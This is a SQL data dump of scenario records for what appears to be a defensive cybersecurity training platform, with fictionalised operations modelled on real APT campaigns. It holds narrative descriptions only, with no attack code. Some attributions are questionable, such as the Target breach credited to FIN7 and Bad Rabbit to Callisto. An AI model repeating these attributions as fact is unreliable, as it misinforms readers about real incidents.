(24, 'Operation Pipeline Shut', 'DarkSide', 'Learn to defend against DarkSide with this beginner operation: Pipeline Shut, designed for cybersecurity training.', 'In the wake of increasing cyber threats, DarkSide has targeted a major energy pipeline. As part of the security team, you must identify and mitigate their efforts. This operation will take you through the critical stages of an attack, from initial access to data exfiltration.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"DarkSide\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"pipeline security\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"beginner threat detection\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 04:13:17', 'Operation Pipeline Shut: Training Scenario Against DarkSide', 'Learn to defend against DarkSide with this beginner operation: Pipeline Shut, designed for cybersecurity training.', 'operation-pipeline-shut', 1),
(25, 'Operation Kinetic Strike', 'REvil (Sodinokibi)', 'Intermediate cybersecurity operation simulating REvil\'s tactics for effective threat response training.', 'In the wake of escalating ransomware attacks, Operation Kinetic Strike challenges your cybersecurity team to defend against REvil, a notorious APT group. Your mission is to detect and mitigate their attack as they compromise a fictional corporation\'s network. Stay vigilant as REvil employs sophisticated techniques in a bid to encrypt sensitive data and demand a hefty ransom.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"REvil Ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity Training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT Group Simulation\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Threat Detection\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Ransomware Defense\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 04:24:42', 'Operation Kinetic Strike: REvil Ransomware Simulation', 'Intermediate cybersecurity operation simulating REvil\'s tactics for effective threat response training.', 'operation-kinetic-strike', 1),
(26, 'Operation File Transfer', 'Cl0p (TA505)', 'Engage in an advanced simulation against Cl0p (TA505), focusing on their sophisticated file transfer tactics.', 'In the midst of a bustling financial quarter, your organization receives a tip-off about Cl0p (TA505) targeting your infrastructure. This notorious APT group is known for their adeptness in exploiting network vulnerabilities for massive data exfiltration. As part of the cybersecurity team, you must thwart their Operation File Transfer before critical data falls into the wrong hands.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Cl0p APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"advanced threat simulation\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"file transfer security\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-04 04:37:17', 'Operation File Transfer: Cl0p\'s Advanced Tactics', 'Engage in an advanced simulation against Cl0p (TA505), focusing on their sophisticated file transfer tactics.', 'operation-file-transfer', 1),
(27, 'Operation Midnight Storm', 'Nobelium (Midnight Blizzard)', 'Train on detecting and mitigating Nobelium\'s cloud-based identity attacks targeting diplomatic entities.', 'In a world of escalating cyber threats, a new wave of attacks has emerged, targeting diplomatic entities through sophisticated cloud identity compromises. Nobelium, the notorious APT group linked to Russia\'s SVR, has launched a campaign using advanced techniques like password spraying and token theft to bypass MFA. Your mission is to investigate these breaches, uncover rogue OAuth applications, and secure the compromised systems.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Nobelium\\\",\\\"cloud security\\\",\\\"identity compromise\\\",\\\"APT29\\\",\\\"cybersecurity training\\\"]\"', '', 5, '2026-01-04 23:54:35', 'Nobelium Cloud Identity Compromise Simulation', 'Train on detecting and mitigating Nobelium\'s cloud-based identity attacks targeting diplomatic entities.', 'operation-midnight-storm', 1),
(28, 'Operation Volt Strike', 'Volt Typhoon', 'Train to detect Volt Typhoon\'s stealthy living off the land tactics using built-in Windows tools in critical infrastructure.', 'In the world of cyber espionage, stealth is paramount. Volt Typhoon, a notorious APT group, has launched a covert operation targeting critical infrastructure sectors. Their modus operandi: blending in with legitimate administrative activity using only native Windows tools. As a cybersecurity analyst, your mission is to uncover this clandestine campaign, piecing together subtle clues that reveal their presence. Can you follow the trail and mitigate the threat before it\'s too late?', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Volt Typhoon\\\",\\\"cybersecurity training\\\",\\\"LOLBins\\\",\\\"critical infrastructure\\\",\\\"advanced threat detection\\\"]\"', '', 5, '2026-01-04 23:56:24', 'Advanced Detection of LOLBins in Critical Infrastructure by Volt Typhoon', 'Train to detect Volt Typhoon\'s stealthy living off the land tactics using built-in Windows tools in critical infrastructure.', 'operation-volt-strike', 1),
(29, 'Operation Charming Charter', 'Charming Kitten (Phosphorus)', 'Analyze Charming Kitten\'s social engineering campaign targeting journalists via WhatsApp and email using DownPaper backdoor.', 'In recent months, the notorious APT group Charming Kitten has intensified its operations, targeting journalists and human rights activists. Using social engineering tactics via WhatsApp and email, they aim to infiltrate networks and extract sensitive information. This operation focuses on analyzing the DownPaper backdoor and the credential harvesting tactics disguised as legitimate interview requests.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Charming Kitten\\\\\\\",\\\\\\\"social engineering\\\\\\\",\\\\\\\"DownPaper\\\\\\\",\\\\\\\"credential harvesting\\\\\\\"]\\\"\"', '', 5, '2026-01-04 23:58:37', 'Charming Kitten Social Engineering and DownPaper Analysis', 'Analyze Charming Kitten\'s social engineering campaign targeting journalists via WhatsApp and email using DownPaper backdoor.', 'operation-charming-charter', 1),
(30, 'Operation Fox Hunt', 'Fox Kitten', 'Experience Fox Kitten\'s APT exploitation of VPN concentrators to infiltrate and compromise domain controllers.', 'In this scenario, the notorious Fox Kitten APT group targets unpatched VPN concentrators, swiftly penetrating corporate networks. Once inside, they rapidly deploy web shells and move laterally to compromise the domain controller, dumping critical credentials and paving the way for further exploitation. Participants must identify and neutralize the threat to protect sensitive enterprise environments.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Fox Kitten\\\\\\\",\\\\\\\"VPN Exploit\\\\\\\",\\\\\\\"Domain Controller\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\",\\\\\\\"APT\\\\\\\"]\\\"\"', '', 7, '2026-01-05 00:00:59', 'Fox Kitten\'s VPN Exploit and Domain Controller Breach', 'Experience Fox Kitten\'s APT exploitation of VPN concentrators to infiltrate and compromise domain controllers.', 'operation-fox-hunt', 1),
(33, 'Operation Swipe Left', 'FIN6', 'Investigate a breach by FIN6 using Trinity malware to scrape credit card data from a retail giant\'s POS network.', 'In this intermediate-level training scenario, participants will dive into a high-stakes breach investigation involving the notorious cybercrime group FIN6. The group has infiltrated a leading retail company\'s Point-of-Sale (POS) network using compromised vendor credentials. Their goal? To deploy the insidious \'Trinity\' malware, designed to scrape sensitive credit card data directly from RAM before it can be encrypted. As the investigation unfolds, you must trace their steps through the network, piece together the attack sequence, and mitigate the damage.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"FIN6\\\",\\\"Trinity malware\\\",\\\"POS network breach\\\",\\\"cybersecurity training\\\",\\\"credit card data\\\"]\"', '', 5, '2026-01-05 00:09:23', 'FIN6 Breach Simulation: Uncovering Trinity Malware in Retail POS Network', 'Investigate a breach by FIN6 using Trinity malware to scrape credit card data from a retail giant\'s POS network.', 'operation-swipe-left', 1),
(32, 'Operation Cart Skimmer', 'Magecart (Group 12)', 'Experience an intermediate-level Magecart attack scenario with digital skimming and data exfiltration analysis.', 'In this scenario, participants are tasked with analyzing a sophisticated digital skimming attack orchestrated by Magecart Group 12. The attack targets the checkout pages of numerous online stores through a compromised third-party advertising library. Participants will uncover obfuscated JavaScript code and trace the exfiltrated data to an external drop server, simulating real-world cybersecurity challenges.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Magecart\\\",\\\"digital skimming\\\",\\\"cybersecurity training\\\",\\\"JavaScript analysis\\\",\\\"data exfiltration\\\"]\"', '', 3, '2026-01-05 00:06:31', 'Magecart Digital Skimming Attack Simulation', 'Experience an intermediate-level Magecart attack scenario with digital skimming and data exfiltration analysis.', 'operation-cart-skimmer', 1),
(34, 'Operation Primitive Bear', 'Gamaredon (Shuckworm)', 'Simulate a Gamaredon cyber-espionage campaign targeting military personnel with weaponized Word documents and VBScript backdoors.', 'In this training scenario, participants will navigate a simulated cyber-espionage campaign orchestrated by the notorious APT group, Gamaredon, also known as Shuckworm. The operation centers around a high-volume attack targeting military personnel using weaponized Word documents. Trainees will delve into how these documents leverage template injection techniques and incorporate custom VBScript backdoors to facilitate rapid data theft. This exercise will enhance understanding of how such threats manifest in real-world scenarios and prepare analysts to identify and mitigate similar threats.', 'beginner', 0, 1, 0, 60, NULL, '\"[\\\"Gamaredon\\\",\\\"cyber-espionage\\\",\\\"Word document injection\\\",\\\"VBScript backdoor\\\",\\\"military cybersecurity\\\"]\"', '', 3, '2026-01-05 02:58:53', 'Gamaredon Espionage Simulation: Weaponized Word Docs & VBScript Backdoors', 'Simulate a Gamaredon cyber-espionage campaign targeting military personnel with weaponized Word documents and VBScript backdoors.', 'operation-primitive-bear', 1),
(35, 'Operation Energy Bear', 'Dragonfly (Energetic Bear)', 'Simulate Dragonfly\'s strategic intrusion in the energy sector using trojanized ICS software updates.', 'In this scenario, the notorious Dragonfly APT group, also known as Energetic Bear, targets the energy sector by infiltrating the supply chain. The attackers have trojanized legitimate software updates for industrial control systems (ICS) equipment. This operation will train participants to identify the \'Havex\' RAT and trace the network reconnaissance activities within an industrial control network, enhancing their skills in defending critical infrastructure.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Dragonfly APT\\\\\\\",\\\\\\\"ICS security\\\\\\\",\\\\\\\"Havex RAT\\\\\\\",\\\\\\\"cyber threat intelligence\\\\\\\",\\\\\\\"supply chain attack\\\\\\\"]\\\"\"', '', 5, '2026-01-05 03:01:44', 'Dragonfly\'s ICS Supply Chain Attack Simulation', 'Simulate Dragonfly\'s strategic intrusion in the energy sector using trojanized ICS software updates.', 'operation-energy-bear', 1),
(36, 'Operation Hotel Guest', 'DarkHotel', 'Advanced scenario: DarkHotel targets luxury hotel executives via Wi-Fi, delivering Tapaoux malware disguised as updates.', 'In a high-stakes cyber operation, the notorious APT group DarkHotel has launched a precision spear-phishing campaign targeting executives staying at luxury hotels. Leveraging the hotel\'s Wi-Fi network, they deliver sophisticated, signed malware disguised as software updates. Trainees will analyze the Tapaoux malware and investigate certificate spoofing tactics used by the attackers to compromise their high-profile targets.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"DarkHotel\\\\\\\",\\\\\\\"spear-phishing\\\\\\\",\\\\\\\"Tapaoux malware\\\\\\\",\\\\\\\"certificate spoofing\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\"]\\\"\"', '', 5, '2026-01-05 03:03:57', 'DarkHotel Spear-Phishing Attack on Luxury Hotel Executives', 'Advanced scenario: DarkHotel targets luxury hotel executives via Wi-Fi, delivering Tapaoux malware disguised as updates.', 'operation-hotel-guest', 1),
(37, 'Operation Sea Lotus', 'Naikon', 'Investigate Naikon\'s espionage using RoyalRoad and Aria-body in a South China Sea cyber operation.', 'In the geopolitical hotspot of the South China Sea, a sophisticated threat actor, Naikon, has launched a stealthy cyber espionage campaign. Using the RoyalRoad RTF weaponizer, they deliver the Aria-body backdoor, gaining access to sensitive information. This operation requires you to meticulously analyze alerts, trace the attack path, and uncover the command and control infrastructure disguised as legitimate government domains. Your mission is to dismantle this campaign and safeguard regional cybersecurity.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Naikon APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"RoyalRoad exploit\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Aria-body backdoor\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Espionage campaign\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity training\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-05 03:07:33', 'South China Sea Espionage: Uncovering Naikon\'s RoyalRoad Exploit', 'Investigate Naikon\'s espionage using RoyalRoad and Aria-body in a South China Sea cyber operation.', 'operation-sea-lotus', 1),
(39, 'Operation Ghost Writer', 'UNC1151', 'Train on UNC1151\'s tactics in hacking news sites to spread misinformation, from CMS breaches to social media manipulation.', 'In this training scenario, participants will dive into the world of cyber-influence operations orchestrated by UNC1151. This APT group has targeted popular news websites, compromising their CMS accounts to publish false narratives. As the fabricated stories spread, a coordinated effort on social media amplifies the misinformation, challenging trainees to trace the attack and mitigate its impact.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"UNC1151\\\",\\\"cyber-influence\\\",\\\"APT training\\\",\\\"media manipulation\\\",\\\"CMS hacking\\\"]\"', '', 5, '2026-01-05 03:21:54', 'UNC1151\'s Media Manipulation: A Cyber-Influence Training Scenario', 'Train on UNC1151\'s tactics in hacking news sites to spread misinformation, from CMS breaches to social media manipulation.', 'operation-ghost-writer', 1),
(40, 'Operation Wicked Game', 'APT41 (Wicked Panda)', 'Experience an advanced simulation of APT41\'s supply chain attack on the gaming industry, featuring the ShadowPad payload.', 'In this high-stakes training scenario, participants will delve into a sophisticated supply chain attack orchestrated by APT41, a notorious cyber threat group from China. The operation focuses on the gaming industry, where attackers have infiltrated the build environment of a popular game to inject a malicious backdoor, known as ShadowPad, into the game\'s executable. This backdoor is then distributed to millions of unsuspecting players, setting the stage for a widespread cybersecurity breach. Trainees must navigate through a series of alerts to uncover the full scope of the attack and neutralize the threat.', 'advanced', 0, 1, 1, 60, NULL, '\"[\\\"Supply Chain Attack\\\",\\\"APT41\\\",\\\"ShadowPad\\\",\\\"Cybersecurity Training\\\",\\\"Gaming Industry\\\"]\"', '', 5, '2026-01-05 03:25:53', 'Advanced Supply Chain Attack Simulation with APT41', 'Experience an advanced simulation of APT41\'s supply chain attack on the gaming industry, featuring the ShadowPad payload.', 'operation-wicked-game', 1),
(41, 'Operation Heavy Anchor', 'Lazarus (Andariel)', 'Advanced training scenario exploring Lazarus Group\'s cyber-attack on South Korean defense firms to steal sensitive tank and laser weapon designs.', 'In a high-stakes cyber espionage campaign, the notorious Lazarus Group, specifically its Andariel sub-group, has set its sights on the South Korean defense industrial base. Their objective: to infiltrate and exfiltrate sensitive schematics of cutting-edge tank and laser weaponry. Utilizing their signature DTrack malware, the attackers employ a sophisticated kill chain to breach defenses, maintain persistence, and ultimately achieve their goal of intelligence theft.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"DTrack malware\\\\\\\",\\\\\\\"cyber espionage\\\\\\\",\\\\\\\"defense industrial base\\\\\\\",\\\\\\\"APT\\\\\\\"]\\\"\"', '', 5, '2026-01-05 04:00:31', 'Operation Stealth Blueprint: Lazarus Group Targeting Defense Secrets', 'Advanced training scenario exploring Lazarus Group\'s cyber-attack on South Korean defense firms to steal sensitive tank and laser weapon designs.', 'operation-heavy-anchor', 1),
(42, 'Operation Kitty Corner', 'CopyKittens', 'Train to counter CopyKittens\' Matryoshka RAT targeting foreign affairs via DNS tunneling.', 'In this scenario, participants will engage in a simulated espionage campaign orchestrated by the notorious APT group, CopyKittens. The group has set its sights on Ministries of Foreign Affairs, deploying their infamous \'Matryoshka\' RAT to infiltrate and exfiltrate sensitive governmental documents. Participants must decode encrypted DNS traffic to thwart the attackers and secure critical intelligence.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"CopyKittens\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Matryoshka RAT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"DNS tunneling\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"espionage\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-05 04:02:16', 'Operation Matryoshka: CopyKittens Espionage Drill', 'Train to counter CopyKittens\' Matryoshka RAT targeting foreign affairs via DNS tunneling.', 'operation-kitty-corner', 1),
(43, 'Operation Rocket Man', 'Rocket Kitten', 'Simulate and analyze Rocket Kitten\'s tactics targeting aerospace firms using \'Gholee\' malware and fake personas.', 'In a world where every byte of data can shape destinies, Rocket Kitten, a notorious APT group, sets its sights on the aerospace industry. Utilizing their infamous \'Gholee\' malware and deceptive social engineering via fake Facebook profiles, they embark on a mission to infiltrate, persist, and exfiltrate critical data. Trainees, prepare to navigate through a web of deceit and cybersecurity challenges.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Rocket Kitten\\\",\\\"Gholee malware\\\",\\\"cybersecurity training\\\",\\\"APT simulation\\\",\\\"aerospace security\\\"]\"', '', 6, '2026-01-06 01:22:55', 'Rocket Kitten\'s Aerospace Intrusion Simulation', 'Simulate and analyze Rocket Kitten\'s tactics targeting aerospace firms using \'Gholee\' malware and fake personas.', 'operation-rocket-man', 1),
(44, 'Operation Jolly Roger', 'Lazarus (WannaCry)', 'Engage in an advanced cybersecurity scenario analyzing the SMB propagation of WannaCry via EternalBlue.', 'In May 2017, the world witnessed a massive ransomware outbreak known as WannaCry, orchestrated by the notorious Lazarus APT group. Exploiting the EternalBlue vulnerability in Microsoft SMB protocol, the ransomware spread rapidly, causing widespread panic and disruption. As a senior cyber threat intelligence analyst, your mission is to dissect this attack, understanding its propagation mechanics, identifying potential kill-switch domains, and determining if decryption is possible without succumbing to ransom demands.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"WannaCry\\\\\\\",\\\\\\\"EternalBlue\\\\\\\",\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"Ransomware\\\\\\\",\\\\\\\"Cybersecurity Training\\\\\\\"]\\\"\"', '', 8, '2026-01-06 01:32:21', 'Global Ransomware Outbreak Simulation: Analyzing EternalBlue and WannaCry', 'Engage in an advanced cybersecurity scenario analyzing the SMB propagation of WannaCry via EternalBlue.', 'operation-jolly-roger', 1),
(45, 'Operation Blackout', 'Sandworm (NotPetya)', 'Train to identify Sandworm\'s wiper attack masquerading as ransomware via compromised software updates.', 'In this beginner-level training scenario, you\'ll confront a cyber attack orchestrated by the notorious Sandworm group. Disguised as ransomware, the attack spreads through a compromised update of an accounting software, aiming to destroy data and disrupt operations. Participants will learn to identify the master boot record (MBR) overwriting behavior and the use of Mimikatz to harvest credentials, facilitating rapid lateral movement across networks.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sandworm\\\\\\\",\\\\\\\"wiper attack\\\\\\\",\\\\\\\"NotPetya\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"ransomware disguise\\\\\\\"]\\\"\"', '', 5, '2026-01-06 01:35:52', 'Sandworm\'s Ransomware Disguise: MBR Wiper Attack', 'Train to identify Sandworm\'s wiper attack masquerading as ransomware via compromised software updates.', 'operation-blackout', 1),
(46, 'Operation Bad Rabbit', 'Callisto Group? (Unattributed)', 'Investigate Callisto Group\'s ransomware drive-by download attack using fake Adobe Flash updates and analyze the DiskCryptor ransomware code.', 'In a rapidly evolving digital landscape, the Callisto Group has launched a sophisticated ransomware campaign. Utilizing compromised news sites as a vector, unsuspecting users are lured into downloading fake Adobe Flash updates. Once executed, the payload encrypts the victim\'s hard drive using DiskCryptor and propagates through networks via SMB, demanding a hefty ransom. This scenario will take participants through a realistic threat investigation to dissect the attack\'s stages.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"ransomware\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"cybersecurity training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"drive-by download\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"DiskCryptor\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 5, '2026-01-06 01:38:27', 'Analyzing Callisto Group\'s Ransomware via Fake Adobe Updates', 'Investigate Callisto Group\'s ransomware drive-by download attack using fake Adobe Flash updates and analyze the DiskCryptor ransomware code.', 'operation-bad-rabbit', 1),
(47, 'Operation False Flag', 'Sandworm (Olympic Destroyer)', 'Investigate a Sandworm cyberattack disrupting a major sporting event, uncovering false flags and true attribution.', 'As the world gathers to witness the grandeur of a major sporting event\'s opening ceremony, chaos ensues as an unexpected cyberattack disrupts the celebration. The attack, attributed to the notorious Sandworm group, carries false flags pointing towards other nations. Participants will deconstruct the malware to trace its true origins, drawing parallels to Sandworm\'s previous operations. This exercise will test your skills in attribution and understanding of advanced persistent threats.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sandworm\\\\\\\",\\\\\\\"Olympic Destroyer\\\\\\\",\\\\\\\"cyberattack\\\\\\\",\\\\\\\"malware analysis\\\\\\\",\\\\\\\"APT Group\\\\\\\"]\\\"\"', '', 5, '2026-01-06 01:43:17', 'Sandworm Cyberattack: Unveiling the Olympic Ceremony Disruption', 'Investigate a Sandworm cyberattack disrupting a major sporting event, uncovering false flags and true attribution.', 'operation-false-flag', 1),
(48, 'Operation Shadow Hammer', 'Barium (Winnti)', 'Investigate a sophisticated supply chain attack that compromised the ASUS Live Update utility, targeting specific MAC addresses.', 'In an unprecedented cyber offensive, APT41, also known as Barium, launched a surgical strike within a mass infection by compromising the ASUS Live Update utility. This operation, dubbed \'Shadow Strike\', saw the deployment of malware targeting specific MAC addresses, revealing a calculated and highly selective attack amidst a sea of potential victims. Trainees must navigate through this complex landscape to uncover the true objectives and mitigate the threats posed by this advanced persistent threat group.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"\\\\\\\"[\\\\\\\\\\\\\\\"Supply Chain Attack\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"APT41\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"ASUS Live Update\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Cybersecurity Training\\\\\\\\\\\\\\\",\\\\\\\\\\\\\\\"Barium\\\\\\\\\\\\\\\"]\\\\\\\"\\\"\"', '', 8, '2026-01-06 02:34:49', 'Operation Shadow Strike: The ASUS Supply Chain Breach', 'Investigate a sophisticated supply chain attack that compromised the ASUS Live Update utility, targeting specific MAC addresses.', 'operation-shadow-hammer', 1),
(49, 'Operation Cloud Atlas', 'Inception', 'Train on detecting Inception APT\'s Cloud Atlas malware targeting Eastern European diplomats.', 'In the heart of Eastern Europe, diplomatic entities face a sophisticated threat. The Inception APT group, known for its high-level espionage capabilities, launches a campaign using the elusive Cloud Atlas malware. Leveraging popular cloud storage services, they aim to infiltrate and extract sensitive information while evading detection. As a cybersecurity analyst, you are tasked with unraveling their tactics and protecting critical diplomatic communications.', 'beginner', 0, 1, 1, 60, NULL, '\"[\\\"cybersecurity training\\\",\\\"APT Inception\\\",\\\"Cloud Atlas malware\\\",\\\"espionage campaign\\\",\\\"Eastern Europe\\\"]\"', '', 3, '2026-01-07 22:28:11', 'Inception APT: Espionage in Eastern Europe', 'Train on detecting Inception APT\'s Cloud Atlas malware targeting Eastern European diplomats.', 'operation-cloud-atlas', 1),
(50, 'Operation Red October', 'Rocra', 'Analyze Rocra\'s malware in a cyber-espionage campaign targeting diplomatic and research sectors.', 'In the shadows of international diplomacy and scientific innovation, a silent threat emerges. Rocra, an advanced persistent threat group, launches a massive cyber-espionage campaign targeting diplomatic, governmental, and scientific research organizations. The objective: to pilfer sensitive, encrypted information and recover deleted data from unsuspecting victims\' USB drives. Trainees must navigate this intricate operation, uncover the Rocra malware framework, and counteract its espionage tactics.', 'intermediate', 0, 1, 1, 60, NULL, '\"[\\\"Rocra\\\",\\\"cyber-espionage\\\",\\\"APT\\\",\\\"malware analysis\\\",\\\"data exfiltration\\\"]\"', '', 5, '2026-01-07 22:28:37', 'Operation Red October: Unveiling Rocra\'s Cyber-Espionage Tactics', 'Analyze Rocra\'s malware in a cyber-espionage campaign targeting diplomatic and research sectors.', 'operation-red-october', 1),
(51, 'Operation Flame', 'Equation Group', 'Analyze Equation Group\'s sophisticated malware in the Middle East using MD5 collisions and espionage modules.', 'In the dimly lit corridors of cyberspace, the Equation Group has unleashed a sophisticated malware platform targeting Middle Eastern entities. This scenario requires you to dissect intricate modules for audio recording, Bluetooth sniffing, and screen capture, while unraveling the mystery of MD5 collision attacks used to sign their malware. As tensions rise, your mission is to trace the attackers\' steps, analyze their tactics, and neutralize the threat before critical data is exfiltrated.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Equation Group\\\\\\\",\\\\\\\"cyber-espionage\\\\\\\",\\\\\\\"malware analysis\\\\\\\",\\\\\\\"MD5 collision\\\\\\\",\\\\\\\"Middle East\\\\\\\"]\\\"\"', '', 5, '2026-01-07 22:31:17', 'Unraveling Equation Group\'s Espionage: A Deep Dive into Advanced Malware Tactics', 'Analyze Equation Group\'s sophisticated malware in the Middle East using MD5 collisions and espionage modules.', 'operation-flame', 1);
INSERT INTO `operations` (`id`, `title`, `apt_group`, `description`, `story_intro`, `difficulty_level`, `display_order`, `is_active`, `is_premium`, `passing_grade`, `time_limit_hours`, `tags`, `scenario_prompt`, `total_alerts`, `created_at`, `seo_title`, `seo_description`, `slug`, `min_level`) VALUES
(52, 'Operation Centrifuge Saboteur', 'Equation Group (Stuxnet)', 'Investigate a PLC rootkit by Equation Group causing physical damage to industrial systems.', 'Amidst rising geopolitical tensions, a covert cyber-weapon has been unleashed on critical infrastructure. The Equation Group, with its sophisticated arsenal, has deployed a rootkit targeting industrial PLCs. Your mission is to unravel this operation\'s intricacies, uncovering the plot that manipulates centrifuges while deceiving monitoring systems, ultimately leading to physical sabotage.', 'intermediate', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"cyber-weapon\\\\\\\",\\\\\\\"industrial control systems\\\\\\\",\\\\\\\"PLC rootkit\\\\\\\",\\\\\\\"Equation Group\\\\\\\",\\\\\\\"Stuxnet\\\\\\\"]\\\"\"', '', 5, '2026-01-07 22:33:37', 'Operation Centrifuge Saboteur', 'Investigate a PLC rootkit by Equation Group causing physical damage to industrial systems.', 'operation-centrifuge-saboteur', 1),
(53, 'Operation Sunburst', 'APT29 (Cozy Bear / Nobelium)', 'Analyze the SolarWinds attack by APT29, focusing on the SUNBURST backdoor and C2 techniques.', 'In December 2020, one of the most sophisticated cyber espionage operations in history was uncovered. APT29, a cyber threat group linked to Russia\'s Foreign Intelligence Service, infiltrated the software supply chain of SolarWinds. By injecting a backdoor known as SUNBURST into an Orion software update, they gained access to multiple high-value targets, including government agencies. This training scenario will guide you through the investigation of this complex supply chain attack, exploring the domain generation algorithm used for command and control, and the second-stage payloads deployed to compromise sensitive networks.', 'advanced', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"APT29\\\\\\\",\\\\\\\"SolarWinds\\\\\\\",\\\\\\\"Cyber Espionage\\\\\\\",\\\\\\\"Supply Chain Attack\\\\\\\",\\\\\\\"SUNBURST\\\\\\\"]\\\"\"', '', 8, '2026-01-07 22:37:57', 'Advanced Cybersecurity Training: APT29\'s SolarWinds Supply Chain Attack', 'Analyze the SolarWinds attack by APT29, focusing on the SUNBURST backdoor and C2 techniques.', 'operation-sunburst', 1),
(54, 'Operation Sony Spectacle', 'Lazarus Group (North Korea)', 'Beginner-level training on the Sony Pictures hack by Lazarus Group, focusing on Destover malware analysis and data exfiltration tracing.', 'In 2014, the entertainment industry was rocked by a devastating cyberattack on Sony Pictures, attributed to the notorious Lazarus Group. This training scenario invites you to step into the shoes of a cybersecurity analyst, dissecting the infamous attack. You\'ll analyze the destructive \'Destover\' wiper malware, trace complex proxy chains used for data exfiltration, and delve into the geopolitical motivations that drove this high-profile breach.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Sony Pictures hack\\\\\\\",\\\\\\\"Lazarus Group\\\\\\\",\\\\\\\"Destover malware\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"beginner\\\\\\\"]\\\"\"', '', 7, '2026-01-07 22:38:59', 'Cybersecurity Training: Analyzing the Sony Pictures Hack by Lazarus Group', 'Beginner-level training on the Sony Pictures hack by Lazarus Group, focusing on Destover malware analysis and data exfiltration tracing.', 'operation-sony-spectacle', 1),
(55, 'Operation Bullseye', 'FIN7 / Anunak', 'Investigate the FIN7 APT Target breach, tracing from HVAC vendor compromise to POS malware and payment network infiltration.', 'During the bustling holiday season, a major retail chain, Target, fell victim to an orchestrated cyberattack. This operation simulates the breach orchestrated by the notorious FIN7 group, also known as Anunak, which led to the compromise of 40 million credit cards. Participants will follow the trail from an unsuspecting HVAC vendor compromise to sophisticated RAM-scraping malware infiltrating POS systems and finally, uncover the lateral movements within the payment network.', 'beginner', 0, 1, 1, 60, NULL, '\"\\\"[\\\\\\\"Target breach\\\\\\\",\\\\\\\"FIN7\\\\\\\",\\\\\\\"cybersecurity training\\\\\\\",\\\\\\\"APT\\\\\\\",\\\\\\\"POS malware\\\\\\\"]\\\"\"', '', 5, '2026-01-08 21:59:26', 'FIN7\'s Retail Breach: Uncovering the Target Holiday Heist', 'Investigate the FIN7 APT Target breach, tracing from HVAC vendor compromise to POS malware and payment network infiltration.', 'operation-bullseye', 1),
